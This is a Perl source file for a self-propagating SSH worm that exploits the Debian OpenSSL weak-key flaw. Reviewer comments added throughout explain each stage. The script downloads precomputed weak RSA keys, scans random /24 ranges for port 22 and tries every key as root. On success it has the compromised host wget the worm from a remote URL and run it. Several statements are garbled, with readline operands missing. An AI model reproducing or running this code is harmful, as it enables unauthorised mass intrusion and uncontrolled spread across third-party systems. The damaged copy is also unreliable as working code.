#!/usr/bin/perl
#
# Just a lil worm code using perl, this code may run so slowly
# which may make you so much bored hahaha.
#
# Simple PoC of ssh worm on debian based linux uses libssl flaw.
# This code is provided by Dj AO of kandangjamur.net to kill his boring time
#
# Reviewer notes (analysis of the sample as shown; the code itself is left
# byte-for-byte):
#   Stage 1 - fetch a pre-generated set of RSA-2048 key pairs from
#             sugar.metasploit.com into $DIRBASE and write the private key
#             file names to privkeyrsa.txt.
#   Stage 2 - forever: pick a random /24 (bikinhost), TCP-probe port 22 on
#             every host in it (scanssh), then try every listed key as root
#             against each host that answered (brutekey), sleep 1200 s, repeat.
#   Stage 3 - on a successful login the remote command re-downloads this
#             script from $URLBASE into $DIRBASE and runs it, i.e. the worm
#             replicates onto the target.
#   Host artifacts left on the source machine: $DIRBASE (/usr/local/share/rsa)
#   holding rsa2048.tar.bz2, the extracted rsa/2048/ tree and privkeyrsa.txt,
#   plus hostlist.txt and sshhost.txt in the working directory; on a target,
#   the same $DIRBASE directory.
#   Network artifacts: one wget to sugar.metasploit.com at start-up, bursts of
#   up to $MAXCHILD parallel TCP/22 connects across one random /24 per cycle,
#   and ssh public-key attempts for root with PasswordAuthentication=no (on a
#   target: repeated failed publickey authentications for root in the sshd log).
#   No system() return value is checked anywhere in the script.
#   This copy is extraction-damaged: the operand of the three "chop(@... = )"
#   statements below is missing.
#
# The next comment line is the author's manual test loop: it tries each key
# file named in rsa.test against a single hard-coded lab host (10.13.8.90,
# user zeus) and records the first key that logs in to vulner.log.
# LIST=$(cat rsa.test);for FILE in $LIST;do echo Using private key $(pwd)/rsa/2048/$FILE;ssh -lzeus -i $(pwd)/rsa/2048/$FILE -o PasswordAuthentication=no 10.13.8.90 "pwd" > /dev/null 2>&1;if [ $? -eq 0 ];then echo $(tput setaf 1)Private key found : $(pwd)/rsa/2048/$FILE$(tput sgr0);echo Private key found : $(pwd)/rsa/2048/$FILE >> vulner.log;break;fi;done

use POSIX;        # _exit() in the forked children
use Switch;       # source-filter switch/case used around fork() below
use IO::Socket;   # IO::Socket::INET TCP probe in scanssh()

$MAXCHILD=100;    # cap on concurrent scanssh() children (see "$count > $MAXCHILD-2" below)
$MAXCON=25;       # cap on concurrent brutekey() children per target host
$|=1;             # autoflush STDOUT so the "Scanning"/"Brute" progress lines appear at once
# Where a compromised host re-fetches this script from ("31337.leet" is not a
# resolvable public domain, so as written the second stage has nowhere to
# download from).
$URLBASE="http://31337.leet/ssh-w0rm.pl";
# Drop/working directory used on the source machine and recreated on targets.
$DIRBASE="/usr/local/share/rsa";
# Unused; the same command string is embedded in brutekey() as the remote command.
#$EXEC="mkdir $DIRBASE;cd $DIRBASE;wget $URLBASE -O $DIRBASE/ssh-w0rm.pl >/dev/null 2>&1;perl $DIRBASE/ssh-worm.pl";

#Download Requirements
# Presence check only: opens the wget binary for reading and dies if it is not
# there. The handle is never read or closed.
open(WGET,"< /usr/bin/wget") or die("Cannot open wget for download\n");

#Download DSA/RSA file
#uncomment this line to compromise DSA 1024 based authentication
#$wgetprivkey1="wget -bct0 http://sugar.metasploit.com/debian_ssh_dsa_1024_x86.tar.bz2";
#system($wgetprivkey1);

#uncomment this line to compromise RSA 2048 based authentication
# wget flags: -b runs in the background, -c resumes a partial file, -t0 retries
# without limit. The archive is saved as $DIRBASE/rsa2048.tar.bz2.
$wgetprivkey2="wget -bct0 http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 -O $DIRBASE/rsa2048.tar.bz2";
system($wgetprivkey2);

#Extract DSA/RSA private key file
#Uncomment for DSA 1024
#system("cd $DIRBASE;tar jxvf debian_ssh_dsa_1024_x86.tar.bz2");
#Uncomment for RSA 2048
# Unpacks inside $DIRBASE; the listing step below expects an rsa/2048/ tree.
system("cd $DIRBASE;tar jxvf rsa2048.tar.bz2");

#Create RSA listing file
#Uncomment for DSA 1024
#system("ls $DIRBASE/dsa/1024/|grep -v pub > $DIRBASE/privkeydsa.txt");
#Uncomment for RSA 2048
# File names under rsa/2048/ whose name does not contain "pub", i.e. the
# private halves, written to $DIRBASE/privkeyrsa.txt. Note the list is later
# opened as "privkeyrsa.txt" relative to the working directory.
system("ls $DIRBASE/rsa/2048/|grep -v pub > $DIRBASE/privkeyrsa.txt");

# Main cycle; the "goto LOOP" at the bottom restarts it indefinitely.
LOOP:
unlink("hostlist.txt");
bikinhost();                                      # writes a fresh random /24 to hostlist.txt
open(HOST,"< hostlist.txt") or die();
unlink("sshhost.txt");                            # scanssh() children append to this file

#Scanning and brute forcing with forking.
#You can use threading to minimize resource
# Readline operand missing in this copy; the list was meant to come from HOST.
chop(@ipAddrT=);
$count=0;
# One child per address: child probes port 22 and exits via _exit; parent
# counts children and wait()s for one whenever the count exceeds $MAXCHILD-2.
for($i=0;$i<=$#ipAddrT;$i++) {
    $count++;
    switch(fork()){
        case 0 { scanssh($ipAddrT[$i]); _exit(0); break; }      # child
        case -1 { print "Fork is failed\n"; _exit(1); break; }  # fork() failed: the whole script exits
        else{ if($count> $MAXCHILD-2) { wait(); $count--; } break; }  # parent
    }
}
# Hosts that accepted a TCP connect on port 22 (written by the scanssh children).
open(SSHHOST, "< sshhost.txt") or die();
chop(@sshAddr = );                                # readline operand missing in this copy
for($j=0;$j<=$#sshAddr;$j++) {
    #Use DSA 1024
    #open(RSAKEY,"< privkeydsa.txt");
    #Use RSA 2048
    open(RSAKEY, "< privkeyrsa.txt");
    chop(@FileKey = );                            # readline operand missing in this copy
    $cnt=0;
    # One child per (host, key) pair, at most $MAXCON in flight per host.
    for($x=0;$x<=$#FileKey;$x++) {
        $cnt++;
        switch(fork()){
            case 0 { brutekey($sshAddr[$j],$FileKey[$x]); _exit(0); break; }  # child
            case -1 { print "fork is failed\n"; _exit(1); break; }            # fork() failed: script exits
            else{ if($cnt>$MAXCON) { wait(); $cnt--; } break; }               # parent
        }
    }
    close(RSAKEY);
}
# uncomment if wanted
# Pause 20 minutes between cycles, then start over with a new random /24.
sleep 1200;
goto LOOP;

#Some function here

# bikinhost ("make hosts"): rewrites hostlist.txt with the 254 addresses
# A.B.C.1 .. A.B.C.254 of one random /24. Each of A, B, C is int(rand(255)),
# i.e. 0..254, so the first octet can be 0 and the /24 is chosen with no
# regard to reserved ranges.
sub bikinhost() {
    unlink("hostlist.txt");
    $numrange=255;
    $blokA=int(rand($numrange));
    $blokB=int(rand($numrange));
    $blokC=int(rand($numrange));
    open(NEWHOST,"> hostlist.txt");
    for($countC=1;$countC<255;$countC++){
        $host=$blokA.".".$blokB.".".$blokC.".".$countC;
        print NEWHOST $host."\n";
    }
    close(NEWHOST);
}

# scanssh($host): TCP connect to $host:22 with an 8 s timeout. On success the
# address is appended to sshhost.txt. Runs in a forked child; every child opens
# the file in append mode with no locking, and the socket is never explicitly
# closed (it goes away with the child's _exit).
sub scanssh() {
    my($host)=@_;
    open(SSHHOST, ">>sshhost.txt");
    print "Scanning $host\n";
    $s = new IO::Socket::INET(Proto => "tcp", PeerAddr => $host, PeerPort=> 22, Timeout=> 8);
    if($s) {
        print SSHHOST $host."\n";
    }
    close(SSHHOST);
}

# brutekey($sshhost, $privkey): one ssh attempt to $sshhost as root using the
# key file rsa/2048/$privkey (a path relative to the current working
# directory, not to $DIRBASE). PasswordAuthentication=no keeps the attempt
# key-only and StrictHostKeyChecking=no suppresses the host-key prompt. If the
# login succeeds, the remote command creates $DIRBASE, fetches $URLBASE into it
# as ssh-w0rm.pl and runs perl on ssh-worm.pl (note the two file names differ).
# All ssh output is discarded and $? is not inspected, so a successful
# compromise is not reported anywhere.
sub brutekey() {
    my($sshhost,$privkey)=@_;
    print "Brute $sshhost using Private Key $privkey\n";
    #Even if i've disabled password authentication, but when the target server is pam enabled (UsePAM yes)
    #this code can't continue massive scanning bcoz password prompt (Or still continue when target server
    #with pam enabled closes connection??).
    $CMD="ssh -lroot -o PasswordAuthentication=no -o StrictHostKeyChecking=no -i rsa/2048/$privkey $sshhost \"if [ ! -d $DIRBASE ];then mkdir $DIRBASE;cd $DIRBASE;wget $URLBASE -O $DIRBASE/ssh-w0rm.pl >/dev/null 2>&1;perl $DIRBASE/ssh-worm.pl;fi\" > /dev/null 2>&1";
    system($CMD);
    #Try to add report when a machine compromised kids!
    #I don't want this code used by kiddie who can't analyse this lame code
    #Hint : Use $? variable okay?!
}